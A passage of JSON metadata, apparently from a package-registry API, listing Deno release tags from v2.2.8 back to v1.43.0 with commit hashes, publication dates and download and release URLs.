tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"d